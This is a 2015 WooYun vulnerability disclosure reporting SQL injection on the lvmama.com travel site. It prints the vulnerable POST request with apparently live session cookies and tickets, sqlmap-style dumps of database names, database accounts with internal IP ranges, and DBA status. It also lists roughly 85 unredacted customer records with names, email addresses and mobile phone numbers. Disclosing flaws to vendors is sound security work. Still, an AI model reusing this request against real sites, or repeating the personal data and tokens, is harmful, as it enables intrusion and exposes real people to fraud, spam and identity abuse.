当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149508

漏洞标题:驴妈妈旅游网SQL注入漏洞(涉及40W用户信息/邮箱/手机号码)

相关厂商:驴妈妈旅游网

漏洞作者: Xmyth_Xi2oMin9

提交时间:2015-10-26 11:47

修复时间:2015-12-10 14:58

公开时间:2015-12-10 14:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-26: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

驴妈妈旅游网创立于2008年,是中国的新型B2C旅游电子商务网站,中国的自助游产品预订及资讯服务平台。成立之初,驴妈妈就以自助游服务商定位市场,经过数年发展,形成了以,同时兼顾跟团游的巴士自由行、长线游、出境游等网络旅游业务,为游客出行提供一站式服务便利。

详细说明:

POST /zt/promo/jingpai/ HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://www.lvmama.com/zt/promo/jingpai/?losc=018454
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.lvmama.com
Content-Length: 22
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: uid=wKgKcFYog5wUhDoMAwSLAg==; lvsessionid=6bae512d-cab8-44b0-8484-dbf3dc91a2f7_19599120; PHPSESSID=8jeoh55slod7o2kdjqapfg3ke7; cmTPSet=Y;
CoreID6=80631807383514455029084&ci=90409730; JSESSIONID=D5BFF75625F84EBBE7EBC2BFDA40E347; ip_from_place_id=1; ip_from_place_name=""; ip_area_location=BJ;
ip_location=114.252.84.34; ip_province_place_id=110000; ip_city_place_id=110000; ip_city_name=%E5%8C%97%E4%BA%AC; bdshare_firstime=1445503292281;
Rvyz72RO3yiChuCn=Nd7JknIMvMbwmiaxz91Y1fgy%2BofrdUg5iPag4kOzZdjK64Ach%2FkRy8ak7RlN7fbxI9hNU5V%2Bpo25jKklYvylU9ctWR%2F2gu0Szk6XN2ibMagh9k1kWIp28sgmU6mHWraMxXqg%2FGgUW17nleI1cK9I
%2Foeo0hG3UbsB4IcQZ%2BgZVrCP1DksKEqcVdc1Zg0IKCypFEvlHUhVvQKBRY3XVkFIiotfIFb%2FyxkR1RiuImfCtOuEm%2Bco1NUKix2pJ4J45kk7wt5aGVy2dGoAzR
%2F0VapeEsWFSqIHK4JxrvcIw9jKzIM28E57GpoVKovg0WY1pgPs2bsIVPmlw9P%2FZniVorYY%2BaGeW3BmiWnOOnooCM6W4VsmxUHOt4YQ7HDotUE9kIdyq%2FiAUCniceuIcDb0s%2F1MHjIElt7%2FPJjGYxDn6H4ZuRsd
%2B0%2FCZ4%2FwVq5LhubjFQxuNs%2FAudtMhIm0t5%2FCMx6C0g%3D%3D147184d890600e57142c00419dd6d3b8fb734b5c;
Hm_lvt_006c64491cb8acf2092ce0e0341797fe=1445503759,1445503760,1445503762,1445503780; Hm_lpvt_006c64491cb8acf2092ce0e0341797fe=1445503780; _gscu_1059159971=45503269im498j16;
_gscs_1059159971=455032692ykal116|pv:14; _gscbrs_1059159971=1; CNZZDATA5199293=cnzz_eid%3D146445622-1445503813-%26ntime%3D1445503813; __utmt=1; _lvTrack_UUID=0BBAB92F-E147-
4DFA-995F-4A47F94DA774; _lvTrack_sessionID=DFB3BACB-A4A2-4325-BD2A-E2E9F8ED65C7; 90409730_clogin=v=1&l=1445502908&e=1445506446307; bfd_s=30114658.29133386.1445502959660;
tmc=19.30114658.23722909.1445502959661.1445504673964.1445504675949; tma=30114658.77050305.1445495717462.1445495717462.1445495717462.1; tmd=21.30114658.77050305.1445495717462.;
Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1445495717; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1445504680; bfd_g=a7fcd4ae5266aa7700004f9a00003c4b562883a2;
__xsptplus443=443.2.1445502958.1445504695.9%233%7C%20http%3A%2F%2Fworldcup.lvmama.com%2F%7C%7C%7C%7C%23%23RSaZsYr184i7YqTumvZYCkmKHh5evnOM%23;
__utma=30114658.629155318.1445503956.1445503956.1445503956.1; __utmb=30114658.27.10.1445503956; __utmc=30114658; __utmz=30114658.1445503956.1.1.utmcsr=(direct)|utmccn=
(direct)|utmcmd=(none); CASTGC=TGC-4894-9cPH1OpoQvrcbEXxkS8XlUUpRwPbuhFFichqGwy2Oqbewl5CeM; UN=mtestqingyouawlk%5E%21%5E4028b25b5024472e01502b7213020a7b;
unUserName=mtestqingyouawlk; LSTA=792dda8547d49ad39f58801a348ac4a5; ticket=ST-6718-yWol7IXNAaaSHPbWfnNL; bqeRoYZ7gjxuUl7T=hc9vwzkfrdgsYDymMaiPiQctebJZNegXeCFaJD
%2FVQvZtsP6M5N2Iqs2S9Treo7wvs8EHIjqpMydw1lAw9JSsfuPguLC0Qxp285oJFGb7WZsCh3YoBFnI8YwRP%2FdpJTAOBo2lQBV3fAbJ6ayATnWl1s5wplyPxRJJQ1fn0RbgFn8x0iI5kx3KP5XqaiXU%2BmYLDs
%2BdZWJNNQfn1RJK022w13Jit8oTdYNJpkX8uhRZ
%2Bs2tKdLd1tSamC3AYVrozJlzYy35arQryczKP9xZUwckwXIIRcK9QXJst50CFKr7n4Vk6LjPyX5qSwbzNJoPv3UGBq5OgxC7OfCC4tP55JkvUvi5%2FVWQs2bs6rbUFVuKaOWqtAsx
%2B2cVDab6voEkET4Bf4kEOEqIHCWGQy2YH0dNg3ISjl%2BD20F9XjhEDrozWM4v2PBeGxkS7P4cqYfWLjyUQLNOP4JxUEXaydcct9ixsQ%3D%3D9b93b499da7723026d731c4e157b02851f6358dd
action=ajaxRecord&pid=1

1.png

漏洞证明:

available databases [18]:
[*] info
[*] infonews
[*] information_schema
[*] lmm_core
[*] lmm_customization
[*] lmm_guide
[*] lmm_logs
[*] lmm_lvyou
[*] lmm_message
[*] lmm_module
[*] lmm_subject
[*] lmm_subjects2
[*] lmm_weather
[*] lvmamabus
[*] minisite
[*] mysql
[*] others
[*] post_robot


用户:

database management system users [51]:
[*] 'activity'@'192.168.10.%'
[*] 'bi'@'192.168.10.77'
[*] 'bi_guide'@'192.168.10.%'
[*] 'bi_lvyou'@'192.168.10.%'
[*] 'bi_trip'@'192.168.10.%'
[*] 'customization'@'192.168.10.%'
[*] 'customization'@'192.168.30.%'
[*] 'gonglue'@'192.168.10.%'
[*] 'guide2'@'192.168.10.%'
[*] 'info'@'192.168.10.%'
[*] 'infonews'@'192.168.10.%'
[*] 'intelligence'@'%'
[*] 'lmm_core'@'192.168.10.%'
[*] 'lmm_core'@'192.168.30.%'
[*] 'lmm_core'@'192.168.30.0\\/24'
[*] 'lmm_guide'@'192.168.10.%'
[*] 'lmm_logs'@'192.168.10.%'
[*] 'lmm_logs'@'192.168.30.%'
[*] 'lmm_message'@'192.168.10.%'
[*] 'lmm_message'@'192.168.30.%'
[*] 'lmm_module'@'192.168.10.%'
[*] 'lmm_module'@'192.168.30.%'
[*] 'lmm_subject'@'192.168.10.%'
[*] 'lmm_subject'@'192.168.30.%'
[*] 'lmm_subjects'@'192.168.10.%'
[*] 'lmm_trip'@'192.168.10.55'
[*] 'lmm_trip'@'192.168.30.%'
[*] 'lmm_weather'@'192.168.10.%'
[*] 'lmm_weather'@'192.168.30.%'
[*] 'lv_bbs_x2'@'192.168.10.%'
[*] 'lv_bbs_x2'@'192.168.10.16'
[*] 'lv_ospeed_admin'@'192.168.10.%'
[*] 'lv_oth1058_admin'@'192.168.10.58'
[*] 'lv_others_admin'@'192.168.10.%'
[*] 'lv_others_admin'@'192.168.10.16'
[*] 'lv_spdbank_admin'@'192.168.10.%'
[*] 'lvmama_lvyou'@'192.168.10.%'
[*] 'lvmama_lvyou'@'192.168.30.%'
[*] 'lvmama_lvyou'@'192.168.50.%'
[*] 'lvmamabus'@'192.168.10.%'
[*] 'lvmamaGUIDE22012'@'192.168.10.%'
[*] 'lvmamaGUIDE22012'@'192.168.30.%'
[*] 'lvmamainfo'@'192.168.10.%'
[*] 'minisite'@'192.168.10.%'
[*] 'ndouser'@'192.168.10.%'
[*] 'repl'@'%'
[*] 'root'@'%'
[*] 'root'@'192.168.10.%'
[*] 'root'@'192.168.20.%'
[*] 'root'@'localhost'
[*] 'suipian'@'192.168.10.%'


current user is DBA:    True


1.png


列出一部分 还有很多

| \\u6797\\u71d5\\u73b2                      | 376764085@qq.com              | 18824876464 |
| \\u6c64\\u745e\\u519b | 20134505@qq.com | 18685034481 |
| \\u8881\\u840c\\u840c | 1062846406@qq.com | 18773158473 |
| \\u8d21\\u5a77\\u5a77 | 1067409892@qq.com | 13357399729 |
| \\u9a6c\\u6625\\u4e3d | machunli1314@163.com | 15166998827 |
| \\u949f\\u6d2a\\u4e91 | 76986141@qq.com | 18850251809 |
| \\u7f57\\u7476 | melody1421@163.com | 13590985099 |
| \\u738b\\u6587\\u5f81 | 196645015@qq.com | 15083218171 |
| \\u5468\\u8587 | zhouweideye@yahoo.cn | 13775136536 |
| \\u5f90\\u82b3 | yoyotiankong@163.com | 13677012150 |
| \\u51cc\\u7f8e\\u5a1c | 67253600@qq.com | 13562917517 |
| \\u4e8e\\u4e3d\\u5a1f | 44988508@qq.com | 13764940215 |
| \\u738b\\u4f73\\u96ef | tammy_wjw@163.com | 13918907903 |
| \\u5e2d\\u5a77 | 472339707@qq.com | 18679400560 |
| \\u6c5f\\u529b | 307425235@qq.com | 13879826561 |
| \\u6731\\u4e9a\\u5a1f | juan453585972@qq.com | 15515195572 |
| \\u9648\\u5c11\\u6e05 | 281030126@qq.com | 13590658929 |
| \\u8f9c\\u8bd7\\u60c5 | gushiqing912@sina.com | 18673637725 |
| \\u8463\\u4e39 | klek18@hotmail.com | 13951672988 |
| \\u6881\\u82b8 | 14046511@qq.com | 15050523259 |
| \\u5f20\\u536b\\u82ac | gray0622@163.com | 13588336030 |
| \\u5434\\u654f\\u541b | wmj198744520@qq.com | 13917539124 |
| \\u9648\\u71d5\\u59ae | 1803261422@qq.com | 13534335511 |
| \\u590f\\u76fc\\u76fc | 1402040325@qq.com | 18768145389 |
| \\u6797\\u59d7\\u59d7 | 919689744@qq.com | 13542586180 |
| \\u5434\\u5b59\\u4e50 | wusunle211@qq.com | 18249941158 |
| \\u989c\\u52e4\\u5029 | 836709641@qq.com | 13566688226 |
| \\u6768\\u7a57\\u5a77 | girl_crazy@126.com | 13824765996 |
| \\u5411\\u96ef\\u96ef | 24834123@qq.com | 13628205955 |
| \\u9648\\u8679 | 1303383838@qq.com | 18645559168 |
| \\u9648\\u5ada\\u59ae | 446978302@qq.com | 13708738667 |
| \\u9ec4\\u8273 | 1175455871@qq.com | 13638567969 |
| \\u5434\\u96ea | 592855296@qq.com | 13858960416 |
| \\u5468\\u73fa | 54384333@qq.com | 13636564969 |
| \\u90d1\\u96ea | 447255327@qq.com | 15983790901 |
| \\u4e01\\u679c | 420818849@qq.com | 15575300887 |
| \\u90d1\\u656c | 358134819@qq.com | 18681680885 |
| \\u9648\\u96ea\\u4e39 | xuedan0920@yahoo.cn | 13631033410 |
| \\u59dc\\u5b81 | 42520263@qq.com | 13577002456 |
| \\u738b\\u6653\\u71d5 | 461921825@qq.com | 15080011292 |
| \\u4e8e\\u6db5 | 894147513@qq.com | 18353123458 |
| \\u674e\\u5a1c | 332830969@qq.com | 13077387452 |
| \\u738b\\u7f8e\\u840d | 715719174@qq.com | 13656562643 |
| \\u51af\\u96e8\\u66e6 | 1628268611@qq.com | 15106823857 |
| \\u9b4f\\u79cb\\u51e4 | 769764302@qq.com | 18354230627 |
| \\u5362\\u71d5\\u73b2 | 360731649@qq.com | 13580923988 |
| \\u8463\\u7131 | sz6dy@126.com | 13913184385 |
| \\u77f3\\u521a | 350914521@qq.com | 13973684362 |
| \\u738b\\u680c\\u7fca | 420188530@qq.com | 15858156533 |
| \\u8bb8\\u8d1e\\u59ae | xuzhzhni@163.com | 13652323463 |
| \\u848b\\u6167\\u654f | 625798557@qq.com | 18662065004 |
| \\u6c64\\u4e00\\u654f | 254647921@qq.com | 18858132501 |
| \\u5415\\u6653\\u590f | 1357392808@QQ.COM | 15807711853 |
| \\u738b\\u83b9 | xiaoxueren86@163.com | 13858865688 |
| \\u502a\\u660e | 584280023@qq.com | 13951235229 |
| \\u8521\\u67f3\\u5a77 | 3580359390@163.com | 13580359390 |
| \\u5f90\\u8d85 | menaking241@hotmail.com | 13482429267 |
| \\u53f6\\u5029 | 253746319@qq.com | 13773042868 |
| \\u676d\\u5251\\u9f99 | jianlonghang@163.com | 15895553057 |
| \\u5de8\\u664b\\u71d5 | jujinyan@hotmail.com | 13818121277 |
| \\u738b\\u971e | 635456069@qq.com | 13627655306 |
| \\u8c22\\u4e5d\\u6885 | 709368957@qq.com | 15062777505 |
| \\u5b81\\u6b23 | 121497885@qq.com | 15275599575 |
| \\u674e\\u8389\\u4e39 | 76981247@qq.com | 13838292533 |
| \\u5b81\\u6b23\\u60a6 | 183322004@qq.com | 18716339043 |
| \\u4e54\\u78ca | qiaoming2008@sina.cn | 13292055522 |
| \\u4e50\\u5a9b | 50846840@qq.com | 13811271619 |
| \\u7f57\\u6728\\u6f7a | it2222@126.com | 18998500129 |
| \\u5434\\u660e\\u73e0 | 122438985@qq.com | 15160050876 |
| \\u674e\\u96ea | 1715939757@qq.com | 18282050280 |
| \\u51b7\\u5b9c\\u6625 | elsie-lengyichun@163.com | 13917662850 |
| \\u8096\\u4e39 | 347713257@qq.com | 18744523981 |
| \\u738b\\u7490 | jelly_lue@hotmail.com | 13750830150 |
| \\u6c5f\\u4e9a\\u9a8f | 330323890@qq.com | 18673446284 |
| \\u5468\\u826f\\u666f | fjpxzlj54@163.com | 15980384361 |
| \\u675c\\u6d0b | 1102003821@QQ.COM | 18744006450 |
| \\u5f90\\u8000 | Xuyao@wgats.com | 13764463540 |
| \\u8521\\u8212\\u73b2 | 284456453@qq.com | 15059597008 |
| \\u90d1\\u91cd | zenzun36@163.com | 18675747775 |
| \\u6768\\u4e1d\\u96c1 | ysy05070966@163.com | 18929088605 |
| \\u90b5\\u6960 | 895561820@qq.com | 18254591870 |
| \\u9648\\u6dd1\\u745c | 332591935@qq.com | 13450642111 |
| \\u9ec4\\u7af9 | 53995700@qq.com | 18978639325 |
| \\u656c\\u5c0f\\u6885 | jxiaoy900907@qq.com | 15216658470 |
| \\u5f20\\u6db5\\u5a67 | xiaobai404@126.com | 13568357591 |


Database: others
Table: yx_users
[7 columns]
+-------------+------------------+
| Column | Type |
+-------------+------------------+
| create_time | int(11) |
| email | varchar(128) |
| id | int(10) unsigned |
| lvmama_code | varchar(16) |
| mobile | varchar(16) |
| yx_code | varchar(16) |
| yx_key | varchar(8) |
+-------------+------------------+


1.png

修复方案:

希望审核在厂商确认后 对一些信息适当的打码 辛苦了

版权声明:转载请注明来源 Xmyth_Xi2oMin9@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-26 14:57

厂商回复:

thx

最新状态:

暂无